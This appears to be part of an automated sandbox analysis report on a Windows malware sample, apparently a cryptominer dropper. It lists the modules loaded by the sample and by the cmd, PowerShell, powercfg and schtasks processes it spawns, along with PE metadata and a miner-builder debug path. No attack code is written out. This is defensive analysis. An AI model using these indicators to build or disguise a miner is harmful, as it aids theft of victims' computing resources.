Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Section loaded: msacm32.dll	Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Section loaded: winmmbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Section loaded: winmmbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Section loaded: acgenral.dll	Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Section loaded: msacm32.dll	Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Section loaded: winmmbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Section loaded: winmmbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe	Section loaded: acgenral.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe	Section loaded: msacm32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe	Section loaded: winmmbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe	Section loaded: winmmbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: acgenral.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: msacm32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: winmmbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: winmmbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: fastprox.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: ncobjapi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mpclient.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wmitomi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\powercfg.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\powercfg.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\SysWOW64\powercfg.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\SysWOW64\powercfg.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\SysWOW64\powercfg.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\powercfg.exe	Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\powercfg.exe	Section loaded: powrprof.dll
Source: C:\Windows\SysWOW64\powercfg.exe	Section loaded: powrprof.dll
Source: C:\Windows\SysWOW64\powercfg.exe	Section loaded: powrprof.dll
Source: C:\Windows\SysWOW64\powercfg.exe	Section loaded: umpdc.dll
Source: C:\Windows\SysWOW64\powercfg.exe	Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\powercfg.exe	Section loaded: powrprof.dll
Source: C:\Windows\SysWOW64\powercfg.exe	Section loaded: powrprof.dll
Source: C:\Windows\SysWOW64\powercfg.exe	Section loaded: powrprof.dll
Source: C:\Windows\SysWOW64\powercfg.exe	Section loaded: umpdc.dll
Source: C:\Windows\SysWOW64\powercfg.exe	Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\powercfg.exe	Section loaded: powrprof.dll
Source: C:\Windows\SysWOW64\powercfg.exe	Section loaded: powrprof.dll
Source: C:\Windows\SysWOW64\powercfg.exe	Section loaded: powrprof.dll
Source: C:\Windows\SysWOW64\powercfg.exe	Section loaded: umpdc.dll
Source: C:\Windows\SysWOW64\powercfg.exe	Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\powercfg.exe	Section loaded: powrprof.dll
Source: C:\Windows\SysWOW64\powercfg.exe	Section loaded: powrprof.dll
Source: C:\Windows\SysWOW64\powercfg.exe	Section loaded: powrprof.dll
Source: C:\Windows\SysWOW64\powercfg.exe	Section loaded: umpdc.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: acgenral.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: winmm.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: samcli.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: msacm32.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: dwmapi.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: winmmbase.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: winmmbase.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: aclayers.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: sfc.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: sfc_os.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: acgenral.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: winmm.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: samcli.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: msacm32.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: dwmapi.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: winmmbase.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: winmmbase.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: aclayers.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: sfc.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: sfc_os.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: xmllite.dll

Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: setupx 1.exe1.exe

Static file information: File size 1360384 > 1048576

Source: setupx 1.exe1.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source:	Binary string: C:\Users\Administrator\Desktop\Pch3lkinMinerBuilder\Task32Main\Task32Main\obj\Debug\Task32Main.pdb source: setupx 1.exe1.exe, 00000002.00000003.1308371180.0000000000FB4000.00000004.00000020.00020000.00000000.sdmp, setupx 1.exe1.exe, 00000002.00000003.1308543577.0000000000FEF000.00000004.00000020.00020000.00000000.sdmp, setupx 1.exe1.exe, 00000002.00000003.1308250372.0000000000FED000.00000004.00000020.00020000.00000000.sdmp, ZHKYZWVTC38PGAWGZF49K.exe, 0000000A.00000000.1215296075.0000000000D32000.00000002.00000001.01000000.00000008.sdmp, ZHKYZWVTC38PGAWGZF49K.exe.2.dr
Source:	Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb source: WinRing0x64.sys.10.dr

Source: ZHKYZWVTC38PGAWGZF49K.exe.2.dr

Static PE information: 0x9A21587A [Mon Dec 11 03:03:22 2051 UTC]

Source: winlogson.exe.10.dr	Static PE information: real checksum: 0x7e7c4c should be: 0xe1f33
Source: ZHKYZWVTC38PGAWGZF49K.exe.2.dr	Static PE information: real checksum: 0x0 should be: 0x11c88
Source: setupx 1.exe1.exe	Static PE information: real checksum: 0x0 should be: 0x156ac4

Source: winlogson.exe.10.dr

Static PE information: section name: .xdata

Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: 0_2_00CAC147 push ds; retf	0_2_00CAC148
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: 0_2_00CAC131 push ds; retf	0_2_00CAC136
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: 0_2_00CEDFCA push ecx; ret	0_2_00CEDFDD
